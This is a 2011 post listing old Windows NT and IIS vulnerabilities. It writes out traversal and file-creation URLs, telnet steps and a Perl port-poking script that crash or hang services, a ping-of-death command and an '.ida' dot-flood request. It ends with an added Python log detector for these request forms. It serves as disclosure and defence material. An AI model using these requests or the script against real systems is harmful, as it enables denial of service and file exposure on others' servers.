
            NT vulnerabilities and descriptions (English)

            Posted on 2011-1-13 17:12:25

            Affected systems: 4.0, IIS 1.0

            A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

            A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

            By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

            --------------------------------------------------------------------

            Affected systems: 4.0

            A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

            If the file 'target.bat' exists, the file will be truncated.

            A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

            ----------------------------------------------------------------------

            Affected systems: 3.51, 4.0

            Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

            The following steps;

            Telnet to an NT 4.0 system on port 135
            Type about 10 characters followed by a <CR>
            Exit Telnet

            results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

            When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

            The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

            If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

            The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

            /*begin poke code*/

            use Socket;
            use FileHandle;
            require "chat2.pl";

            $systemname = $ARGV[0] && shift;

            $verbose = 1; # tell me what you're hitting
            $knownports = 1; # don't hit known problem ports
            for ($port = 0; $port<65535; $port++)
            {
                # skip the ports listed above as known problem ports
                if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
                    next;
                }
                $fh = chat::open_port($systemname, $port);
                chat::print ($fh,"This is about ten characters or more");
                if ($verbose) {
                    print "Trying port: $port\n";
                }
                chat::close($fh);
            }

            /*end poke code*/

            Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

            --------------------------------------------------------------------------------

            Affected systems: 4.0

            Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

            This attack causes Dr. Watson to display an alert window and to log an error:

            "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

            --------------------------------------------------------------------------------

            Affected systems: 3.51, 4.0

            Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

            STOP: 0X0000001E
            KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

            -OR-

            STOP: 0x0000000A
            IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

            NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

            --------------------------------------------------------------------------------
            Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

            --------------------------------------------------------

            IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
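
Added example, not part of the original post: a Python check that flags the request forms listed above (slash or backslash traversal, '>' redirection after a script name, encoded newlines, the long dot run ending in 'ida', and .ida/.idq requests) in web server request lines. The sample lines, rule names and the 256-dot threshold are constructed assumptions; .ida/.idq hits also match legitimate Index Server queries, so pair them with the response status before alerting.

```python
import re
from urllib.parse import unquote

DOT_RUN = 256  # assumed threshold; the post describes about 25 KB of '.'

# (rule name, pattern) pairs, one per request form described in the post.
RULES = [
    ("dir-traversal", re.compile(r"\.\.[\\/]")),             # '..\..' or '../..'
    ("cmd-redirect", re.compile(r">")),                      # script>PATH\target.bat
    ("encoded-newline", re.compile(r"[\r\n]")),              # %0A%0D after decoding
    ("ida-dot-flood", re.compile(r"\.{%d,}ida$" % DOT_RUN, re.I)),
    ("ida-idq-request", re.compile(r"\.(?:ida|idq)$", re.I)),
]

def classify(target):
    """Return the names of all rules matched by one request target."""
    path = unquote(target.split("?", 1)[0])  # decode escapes, ignore the query string
    return [name for name, rx in RULES if rx.search(path)]

def scan(lines):
    """Map each flagged request target to the rules it matched."""
    hits = {}
    for line in lines:
        parts = line.split(None, 2)  # METHOD TARGET [rest of line]
        if len(parts) < 2:
            continue
        found = classify(parts[1])
        if found:
            hits[parts[1]] = found
    return hits

# Constructed request lines modelled on the URL forms quoted in the post.
SAMPLE = [
    "GET /default.htm",
    "GET /..\\..",
    "GET /scripts..\\..\\scriptname",
    "GET /scripts/exploit.bat>PATH\\target.bat",
    "GET /scripts/script_name%0A%0D>PATH\\target.bat",
    "GET ../..",
    "GET /" + "." * 300 + "ida",
    "GET /anything.idq",
]

if __name__ == "__main__":
    for target, rules in scan(SAMPLE).items():
        print(target[:60], "->", ", ".join(rules))
```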